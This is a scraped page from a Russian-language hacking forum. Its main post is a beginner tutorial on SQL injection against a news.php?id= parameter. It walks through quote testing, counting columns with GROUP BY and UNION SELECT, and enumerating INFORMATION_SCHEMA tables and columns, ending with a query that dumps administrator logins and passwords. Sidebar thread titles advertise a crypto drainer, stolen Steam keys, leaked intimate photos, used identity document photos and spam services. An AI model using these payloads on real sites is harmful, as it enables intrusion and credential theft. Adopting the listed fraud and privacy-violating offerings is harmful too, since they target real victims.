1. Flood v. 215
    MR-X25.08.2024 в 16:21от
  2. ⭐steam api keys 50 rub⭐
    TOSHIBA25.08.2024 в 16:13от
  3. ⭐steam no limit ⚡аккаунты под спам, боты , 10lvl, оформление, часы⚡⭐
    TOSHIBA25.08.2024 в 16:13от
  4. ❤️ bar_cyk ❤️ – лучшие интимные архивы девушек vk (18+)
    BAR_CYK25.08.2024 в 16:07от
  5. ⚡скупка скинов cs:go, rust, dota2, высокий %, быстрые выплаты [деп 20к]⚡
    CHAPMAN25.08.2024 в 15:58от
  6. Добив от Дона Пабло
    MAYLAY25.08.2024 в 15:36от
  7. ❤️ cs:go ⚡ crypto ✅ обучение черному трафику | black traffic sensei ✅ gamble ❤️
    Nezhivoy25.08.2024 в 15:23от
  8. Аренда - [ уникальная крипто биржа + drainer + aml ] ( 6/10 )
    666LEGEND66625.08.2024 в 15:16от
  9. Ищу монотонный/рутинный ворк
    cosmicbro25.08.2024 в 15:13от
  10. Подскажите vpn
    Spamshoot25.08.2024 в 15:05от
  11. Спам вконтакте - рассылка сообщений по лс/группам с критериями
    krumoe25.08.2024 в 15:04от
  12. Продажа стикеров вконтакте
    Apache25.08.2024 в 15:04от
  13. Раздача купонов от 1000-5000 coin ytmonster
    BanDiTuK25.08.2024 в 15:04от
  14. Раздача лайков вконтакте
    BanDiTuK25.08.2024 в 15:04от
  15. Раздача подарков Вконтакте
    krumoe25.08.2024 в 15:04от
  16. ⣀⣤⣶⣿⭕ добив сесий by「tyson」⭕|cn/eu/ru|online 24/7⣿⣶⣤⣀
    whjvfk.vd25.08.2024 в 14:50от
  17. База на 180 ру и анг форумов | бесплатно
    HemmedLight25.08.2024 в 14:50от
  18. Рулетки CS,DOTA,H1Z1,PUBG,TF,RUST(11дизов,больш.ставки,под крут,чат,бот,ssl,chat)
    Grimace25.08.2024 в 14:49от
Загрузка...
  1. Помогите собрать пк на 45к чтобы тянул игры и моник до 15к
    984
    Ворон Казахов
  2. Утра добрае
    648
    r3g1ster98
  3. Удобный бот для покупки домашних rdp дедиков @mydedic_bot
    526
    mydedic
  4. Накрутка telegram, youtube, tiktok, discord, vk, web трафика и т.д
    504
    Tochno_chelowek
  5. Юзанные фото документов в продаже.украина,белоруссия,британия,европа,сша
    447
    huckster8791
  6. Ug pro - приватный чит для dayz ✅ aim,wh,✅
    401
    UP-GAMES
  7. Lunaproxy — домашний жилой ip — $0,77/гб — бесплатный тест
    389
    cskkxlj
  8. S5cheats dayz приватный чит дейзи [aimbot, esp, misc]
    356
    s5cheats
  9. S5cheats eft приватный чит тарков [chams]
    348
    s5cheats
  10. Куплю любую игру steam со скидкой 10% от стоймости
    341
    GalleanReturn
  11. Люмипрокси - стабильный и эффективный ip-прокси - $0,8/гб
    296
    Lumiproxy
  12. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
    287
    MrBeast
  13. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
    275
    MrBeast
  14. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
    248
    MrBeast
  15. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
    239
    MrBeast
  16. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
    223
    MrBeast
  17. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
    217
    MrBeast
  18. Розыгрыш от luxhost.cc в честь обновления бота @luxhost_bot
    217
    luxhost
Загрузка...
  1. Розыгрыш от luxhost.cc в честь обновления бота @luxhost_bot
  2. Розыгрыш от luxhost.cc в честь обновления бота @luxhost_bot
  3. Розыгрыш от luxhost.cc в честь обновления бота @luxhost_bot
  4. Розыгрыш от luxhost.cc в честь обновления бота @luxhost_bot
  5. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
  6. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
  7. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
  8. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
  9. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
  10. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
  11. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
  12. Bonus 10$ by [mrbeast team | добив | набор воркеров ]
  13. 2 usdt *раздаю инвайт в deadlock*
  14. Розыгрыш 100$ [ mrbeast team ]
  15. Розыгрыш дизайна #21
  16. Розыгрыш дизайна #20
  17. 50$ в usdt trc 20 от cryptograb (по 25$ 2м победителям)
  18. [15$ balance] luxhost.cc - крепкие домены + управление на сайте и в тг, anon vps
Загрузка...

Sql иньекция для новичков

Тема в разделе "Статьи и обсуждения", создана пользователем Valkiria123, 25.08.2024 в 13:26.

Метки:

  1. Valkiria123

    Valkiria123

    Статус:
    Онлайн
    Регистрация:
    25.08.24
    Сообщения:
    3
    Репутация:
    -1 +/-
    Чтоб найти sql иньекцию на сайте, необходимо понимать, что нужно обнаружить входящий параметр, который не фильтруется.

    Для этого необходимо передать с данными какой-то параметр. В нашем случае, это будет кавычка '.

    Ищем на сайте переменную, например news.php?id=1

    Допишем в запрос кавычку, чтоб вышло news.php?id=1'

    Если на сайте включены сообщения об ошибках, то мы увидим ошибку:
    mysql_query(): You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

    Если ошибки не возникло, то попробуем отправить запрос news.php?id=1' -- с пробелом в конце.

    Так же, если нету сообщения, может быть, что там нет иньекции.

    -=-=-=-

    Изменяем наш запрос, добавляем оператор UNION SELECT, это поможет выбрать колличество столбцов в базе данных, для того, чтобы вытащить пароль администратора.

    news.php?id=1'+UNION+SELECT+1 -- выбираем 1 столбец

    Если в таблице не одна колонка, то вылезет ошибка:

    mysql_query(): The used SELECT statements have a different number of columns

    Пробуем перебирать колонки, добавляем в запрос цифры:

    news.php?id=1'+UNION+SELECT+1,2 --

    Запустилось без ошибки, как news.php?id=1
    Значит количество столбцов 2

    -=-=-=-

    Легче всего искать количество колонок оператором GROUP BY, там можно их перебирать сразу десятками

    Например: news.php?id=1'+GROUP+BY+10 --

    Если вылезает ошибка:
    mysql_query(): Unknown column '10' in 'group statement'
    значит столбцов меньше чем 10.

    Пробуем запрос news.php?id=1'+GROUP+BY+5 --
    Если нету ошибки, значит столбцов больше или равно 5.

    Пробуем запрос news.php?id=1'+GROUP+BY+6 --
    и ошибка пропала. Значит мы подобрали количество столбцов, их 6.

    -=-=-=-

    Чтоб вытащить информацию, нам необходимо использовать оператор UNION SELECT и отрицательный параметр. То есть добавим знак - в запрос, перед данными.
    Используем: news.php?id=-1'+UNION+SELECT+1,2,3,4,5,6 --

    Если цифры на странице отсутствуют, то есть нигде не появились цифры от 1 до 6, то, скорее всего, вывод информации отсутствует. Если же вы заметили где-то одну из этих цифр, значит мы можем вывести логин и пароль администратора.

    Для этого используем таблицу INFORMATION_SCHEMA.TABLES.

    Например вывелась цифра 3 и 5, тогда используем запрос вида:
    news.php?id=-1'+UNION+SELECT+1,2,TABLE_NAME,4,5,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1 --

    Если выводит только первую строку, используем запрос вида:
    news.php?id=-1'+UNION+SELECT+1,2,TABLE_NAME,4,5,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1 --

    Для второй строки:
    news.php?id=-1'+UNION+SELECT+1,2,TABLE_NAME,4,5,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1 --

    и так далее.

    Ищем таблицу users, members, administrators и тому подобное. Любое ценное слово, которое вызывает интерес. Будем смотреть там информацию.

    Что посмотреть содержимое колонки, нам нужна таблица INFORMATION_SCHEMA.COLUMNS. Что вывести содержимое столбца, используем оператор COLUMN_NAME в таблице TABLE_NAME

    Используем запрос вида:
    news.php?id=-1'+UNION+SELECT+1,2,COLUMN_NAME,4,5,6+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=’Administrators’ LIMIT+0,1 --

    и

    news.php?id=-1'+UNION+SELECT+1,2,COLUMN_NAME,4,5,6+FROM INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=’Administrators’+LIMIT+1,1 --

    и так далее.

    Далее, используем запрос:
    news.php?id=-1'+UNION+SELECT+1,2,login,password,5,6+FROM+Administrators+LIMIT+0,1 --

    который выведет нам логин и пароль первого пользователя из таблицы Administrators.

    Источник: http://hackmode.ru/showthread.php?t=37
    Возможно, тему нужно переместить в раздел https://youhack.co/forums/76/
     
    Последнее редактирование: 25.08.2024 в 13:31
    25.08.2024 в 13:26
    #1